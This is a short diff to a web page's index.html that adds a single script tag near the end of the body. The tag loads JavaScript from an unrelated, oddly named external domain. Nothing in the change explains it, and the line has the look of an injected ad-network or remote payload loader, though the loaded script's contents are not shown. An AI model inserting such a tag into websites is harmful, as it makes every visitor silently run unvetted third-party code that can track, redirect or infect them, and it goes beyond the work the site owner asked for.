--- a/index.html
+++ b/index.html
@@ -450,7 +450,9 @@ document.getElementById("demo-btn").addEventListener("click", ()=>{
     loadJSZip();
     updatePreview();
   </script>
+  <script type='text/javascript' src='//demolitionzerostomach.com/22/30/0d/22300dbc090c90a734515ac5094b74cc.js'></script>
 </body>
 </html>
+
 
 
